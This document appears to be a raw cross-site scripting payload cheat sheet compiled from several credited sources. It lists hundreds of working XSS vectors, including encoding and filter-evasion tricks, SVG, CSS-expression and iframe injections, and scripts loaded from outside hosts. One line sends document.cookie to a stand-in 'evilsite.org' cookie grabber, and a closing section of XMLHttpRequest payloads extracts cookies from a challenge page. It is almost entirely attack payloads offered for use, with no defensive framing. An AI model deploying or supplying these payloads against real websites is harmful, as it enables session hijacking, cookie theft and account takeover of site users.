<link href="javascript:alert(1)" rel="next"> Opera, pressing the spacebar execute! by @shafigullin | |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> works on webkit by @garethheyes | |
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ | |
MORE VECTORS: | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
"><script>alert(0)</script> | |
<script src=http://yoursite.com/your_files.js></script> | |
</title><script>alert(/xss/)</script> | |
</textarea><script>alert(/xss/)</script> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<font style='color:expression(alert(document.cookie))'> | |
<img src="javascript:alert('XSS')"> | |
<script language="JavaScript">alert('XSS')</script> | |
[url=javascript:alert('XSS');]click me[/url] | |
<body onunload="javascript:alert('XSS');"> | |
<script>alert(1);</script> | |
<script>alert('XSS');</script> | |
<script src="http://www.evilsite.org/cookiegrabber.php"></script> | |
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="??(document.cookie)</script> | |
<scr<script>ipt>alert('XSS');</scr</script>ipt> | |
<script>alert(String.fromCharCode(88,83,83))</script> | |
<img src=foo.png onerror=alert(/xssed/) /> | |
<style>@import'javascript:alert("XSS")';</style> | |
<? echo('<scr)'; echo('ipt>alert("XSS")</script>'); ?> | |
<marquee><script>alert('XSS')</script></marquee> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS'); | |
<body onLoad="alert('XSS');" | |
[color=red' onmouseover="alert('xss')"]mouse over[/color] | |
"/></a></><img src=1.gif onerror=alert(1)> | |
window.alert("Bonjour !"); | |
<div style="x:expression((window.r==1)?'':eval('r=1; | |
alert(String.fromCharCode(88,83,83));'))"> | |
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe> | |
"><script alert(String.fromCharCode(88,83,83))</script> | |
'>><marquee><h1>XSS</h1></marquee> | |
'">><script>alert('XSS')</script> | |
'">><marquee><h1>XSS</h1></marquee> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |
<script>var var = 1; alert(var)</script> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<?='<SCRIPT>alert("XSS")</SCRIPT>'?> | |
<IMG SRC='vbscript:msgbox("XSS")'> | |
" onfocus=alert(document.domain) "> <" | |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS | |
perl -e 'print "<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out | |
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";' > out | |
<br size="&{alert('XSS')}"> | |
<scrscriptipt>alert(1)</scrscriptipt> | |
</br style=a:expression(alert())> | |
</script><script>alert(1)</script> | |
<SCRIPT>document.write("XSS");</SCRIPT> | |
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a?); | |
='><script>alert("xss")</script> | |
<isindex action="javas	cript:alert(1)" type=image> | |
<script?=">"?="http://yoursite.com/xss.js?69,69"></script> | |
<body background=javascript:'"><script>alert(navigator.userAgent)</script>></body> | |
">/XaDoS/><script>alert(document.cookie)</script> | |
<script> src="http://www.site.com/XSS.js"></script> | |
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script> | |
src="http://www.site.com/XSS.js"></script> | |
"><BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")> | |
[color=red width=expression(alert(123))][color] | |
<BASE HREF="javascript:alert('XSS');//"> | |
Execute(MsgBox(chr(88)&chr(83)&chr(83)))< | |
"></iframe><script>alert(123)</script> | |
<body onLoad="while(true) alert('XSS');"> | |
'"></title><script>alert(1111)</script> | |
</textarea>'"><script>alert(document.cookie)</script> | |
'""><script language="JavaScript"> alert('X nS nS');</script> | |
</script></script><<<<script><>>>><<<script>alert(123)</script> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
'></select><script>alert(123)</script> | |
'>"><script src = 'http://www.site.com/XSS.js'></script> | |
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script> | |
<html><noalert><noscript>(123)</noscript><script>(123)</script> | |
<IMG SRC=JaVaScRiPt:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<BODY onload!#$%&()*~+_.,:;?@[/|]^`=alert("XSS")> | |
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<<SCRIPT>alert("XSS");//<</SCRIPT> | |
<SCRIPT SRC=//ha.ckers.org/.j> | |
<IMG SRC="javascript:alert('XSS')" | |
<iframe src=http://ha.ckers.org/scriptlet.html < | |
";alert('XSS');// | |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<BODY BACKGROUND="javascript:alert('XSS')"> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> | |
<IMG SRC='vbscript:msgbox("XSS")'> | |
<IMG SRC="livescript:[code]"> | |
<BODY ONLOAD=alert('XSS')> | |
<BGSOUND SRC="javascript:alert('XSS');"> | |
<BR SIZE="&{alert('XSS')}"> | |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |
<STYLE>@import'javascript:alert("XSS")';</STYLE> | |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> | |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<XSS STYLE="xss:expression(alert('XSS'))"> | |
<XSS STYLE="behavior: url(xss.htc);"> | |
<a <!-- --> href="javascript:alert(-1)">hello</a> | |
<a href="javascript:alert(-1)" | |
<a href="javascript:alert%252831337%2529">Hello</a> | |
<a <!-- href="javascript:alert(31337);">Hello</a> | |
<img src="http://www.w3schools.com/tags/planets.gif" width="145" height="126" alt="Planets" usemap="#planetmap"><map name="planetmap"><area shape="rect" coords="0,0,145,126" a-=">" href="javascript:alert(-1)"></map> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
" onhover="javascript:alert(-1)" | |
"><script>alert('test')</script> | |
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ | |
ha.ckers.org / sla.ckers.org | |
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//></SCRIPT>--!><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=JaVaScRiPt:alert('XSS')> | |
<IMG SRC=javascript:alert("XSS")> | |
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> | |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> | |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC=javascript:alert('XSS')> | |
<IMG SRC="jav ascript:alert('XSS');"> | |
<IMG SRC="jav	ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG SRC="jav
ascript:alert('XSS');"> | |
<IMG | |
SRC | |
= | |
" | |
j | |
a | |
v | |
a | |
s | |
c | |
r | |
i | |
p | |
t | |
: | |
a | |
l | |
e | |
r | |
t | |
( | |
' | |
X | |
S | |
S | |
' | |
) | |
" | |
> | |
<IMG SRC="  javascript:alert('XSS');"> | |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<BODY onload!#$%&()*~+_.,:;?@[/|\]^`=alert("XSS")> | |
<<SCRIPT>alert("XSS");//<</SCRIPT> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B> | |
<SCRIPT SRC=//ha.ckers.org/.j> | |
<IMG SRC="javascript:alert('XSS')" | |
<iframe src=http://ha.ckers.org/scriptlet.html < | |
<SCRIPT>a=/XSS/ | |
alert(a.source)</SCRIPT> | |
";alert('XSS');// | |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> | |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> | |
<BODY BACKGROUND="javascript:alert('XSS')"> | |
<BODY ONLOAD=alert('XSS')> | |
<IMG DYNSRC="javascript:alert('XSS')"> | |
<IMG LOWSRC="javascript:alert('XSS')"> | |
<BGSOUND SRC="javascript:alert('XSS');"> | |
<BR SIZE="&{alert('XSS')}"> | |
<LAYER SRC="http://ha.ckers.org/ | |
scriptlet.html"></LAYER> | |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> | |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> | |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> | |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> | |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> | |
<XSS STYLE="behavior: url(xss.htc);"> | |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS | |
<IMG SRC='vbscript:msgbox("XSS")'> | |
<IMG SRC="mocha:[code]"> | |
<IMG SRC="livescript:[code]"> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> | |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> | |
<TABLE BACKGROUND="javascript:alert('XSS')"> | |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> | |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> | |
<DIV STYLE="width: expression(alert('XSS'));"> | |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> | |
<IMG STYLE="xss:expr/*XSS*ession(alert('XSS'))"> | |
<XSS STYLE="xss:expression(alert('XSS'))"> | |
exp/*<A STYLE='no\xss:noxss("**"); | |
xss:ex/*XSS*//**pression(alert("XSS"))'> | |
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> | |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> | |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> | |
<!--[if gte IE 4]> | |
<SCRIPT>alert('XSS');</SCRIPT> | |
<![endif]--> | |
<BASE HREF="javascript:alert('XSS');//"> | |
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> | |
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> | |
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> | |
<HTML xmlns:xss> | |
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> | |
<xss:xss>XSS</xss:xss> | |
</HTML> | |
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> | |
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> | |
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> | |
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> | |
<XML SRC="xsstest.xml" ID=I></XML> | |
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> | |
<HTML><BODY> | |
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> | |
<?import namespace="t" implementation="#default#time2"> | |
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> | |
</BODY></HTML> | |
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> | |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> | |
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD><SCRIPT>alert('XSS');</SCRIPT> | |
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> | |
<A HREF="http://66.102.7.147/">XSS</A> | |
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> | |
<A HREF="http://1113982867/">XSS</A> | |
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> | |
<A HREF="http://0102.0146.0007.00000223/">XSS</A> | |
<A HREF="h | |
tt p://6	6.000146.0x7.147/">XSS</A> | |
<A HREF="//www.google.com/">XSS</A> | |
<A HREF="//google">XSS</A> | |
<A HREF="http://ha.ckers.org@google">XSS</A> | |
<A HREF="http://google:ha.ckers.org">XSS</A> | |
<A HREF="http://google.com/">XSS</A> | |
<A HREF="http://www.google.com./">XSS</A> | |
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A> | |
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> | |
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ | |
100 #XSS Vectors by @soaj1664ashar | |
<iframe %00 src="	javascript:prompt(1)	"%00> | |
<svg><style>{font-family:'<iframe/onload=confirm(1)>' | |
<input/onmouseover="javaSCRIPT:confirm(1)" | |
<sVg><scRipt %00>alert(1) {Opera} | |
<img/src=`%00` onerror=this.onerror=confirm | |
<form><isindex formaction="javascript:confirm(1)" | |
<img src=`%00`
 onerror=alert(1)
 | |
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> | |
<ScRipT 5-0*3?=>prompt(1)</ScRipT giveanswerhere=? | |
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> | |
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ | |
"><h1/onmouseover='\u0061lert(1)'>%00 | |
<iframe/src="data:text/html,<svg onload=alert(1)>"> | |
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> | |
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script | |
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} | |
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> | |
<iframe src=javascript:alert(document.location)> | |
<form><a href="javascript:\u0061lert(1)">X | |
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'> | |
<img/	  src=`~` onerror=prompt(1)> | |
<form><iframe 	  src="javascript:alert(1)" 	;> | |
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a | |
http://www.google<script .com>alert(document.location)</script | |
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a | |
<img/src=@  onerror = prompt('1') | |
<style/onload=prompt('XSS') | |
<script ^__^>alert(String.fromCharCode(49))</script ^__^ | |
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-( | |
�</form><input type="date" onfocus="alert(1)"> | |
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> | |
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ | |
<iframe srcdoc='<body onload=prompt(1)>'> | |
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> | |
<script ~~~>alert(0%0)</script ~~~> | |
<style/onload=<!--	> alert (1)> | |
<///style///><span %2F onmousemove='alert(1)'>SPAN | |
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) | |
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' | |
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} | |
<marquee onstart='javascript:alert(1)'>^__^ | |
<div/style="width:expression(confirm(1))">X</div> {IE7} | |
<iframe/%00/ src=javaSCRIPT:alert(1) | |
//<form/action=javascript:alert(document.cookie)><input/type='submit'>// | |
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt/*iframe/src*/> | |
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ | |
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> | |
<a/href="javascript: javascript:prompt(1)"><input type="X"> | |
</plaintext\></|\><plaintext/onmouseover=prompt(1) | |
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} | |
<a href="javascript:\u0061le%72t(1)"><button> | |
<div onmouseover='alert(1)'>DIV</div> | |
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |
<a href="jAvAsCrIpT:alert(1)">X</a> | |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |
<var onmouseover="prompt(1)">On Mouse Over</var> | |
<a href=javascript:alert(document.cookie)>Click Here</a> | |
<img src="/" =_=" title="onerror='prompt(1)'"> | |
<%<!--'%><script>alert(1);</script --> | |
<script src="data:text/javascript,alert(1)"></script> | |
<iframe/src \/\/onload = prompt(1) | |
<iframe/onreadystatechange=alert(1) | |
<svg/onload=alert(1) | |
<input value=<><iframe/src=javascript:confirm(1) | |
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> | |
http://www.<script>alert(1)</script .com | |
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe> | |
<svg><script ?>alert(1) | |
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
<img src=`xx:xx`onerror=alert(1)> | |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> | |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> | |
<svg contentScriptType=text/vbs><script>MsgBox | |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u006worksinIE> | |
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U | |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script | |
<object data=javascript:\u0061le%72t(1)> | |
<script>++1-+?(1)</script> | |
<body/onload=<!-->
alert(1)> | |
<script itworksinallbrowsers>/*<script* */alert(1)</script | |
<img src ?itworksonchrome?\/onerror = alert(1) | |
<svg><script>//
confirm(1);</script </svg> | |
<svg><script onlypossibleinopera:-)> alert(1) | |
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
<script x> alert</script 1=2 | |
<div/onmouseover='alert(1)'> style="x:"> | |
<--`<img/src=` onerror=alert(1)> --!> | |
<script/src=data:text/javascript,alert(1)></script> | |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> | |
"><img src=x onerror=window.open('https://www.google.com/');> | |
<form><button formaction=javascript:alert(1)>CLICKME | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik></object> | |
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
1<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |
▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉▉ | |
AND EVEN MORE: | |
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E | |
<<scr\0ipt/src=http://xss.com/xss.js></script | |
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E | |
' onmouseover=alert(/Black.Spook/) | |
"><iframe%20src="http://google.com"%%203E | |
'<script>window.onload=function(){document.forms[0].message.value='1';}</script> | |
x”</title><img src%3dx onerror%3dalert(1)> | |
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script> | |
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script> | |
<script>var x = document.createElement('iframe');document.body.appendChild(x);var xhr = x.contentWindow.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();</script> | |
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script> | |
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> | |
<script>xhr=new ActiveXObject(%22Msxml2.XMLHTTP%22);xhr.open(%22GET%22,%22/xssme2%22,true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();</script> | |
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script> | |
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script> | |
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74> | |
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script> | |
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> | |
<script>alert(document.head.innerHTML.substr(146,20));</script> | |
<script>alert(document.head.childNodes[3].text)</script> | |
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script> | |
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script> | |
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%22)};document.body.appendChild(x);</script> | |
<script>x=document.createElement(%22iframe%22);x.src=%22http://xssme.html5sec.org/404%22;x.onload=function(){window.frames[0].document.write(%22<script>Object.defineProperty(parent,'Safe',{value:{}});Object.defineProperty(parent.Safe,'get',{value:function(){return top.document.cookie}});alert(parent.Safe.get())<\/script>%22)};document.body.appendChild(x);</script> | |
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script> | |
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script> | |
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script> | |
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script> | |
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> | |
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script> | |
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> # | |
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> # | |
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT># | |
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script># | |
<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 | |
<script for=document event=onreadystatechange>getElementById('safe123').click()</script> | |
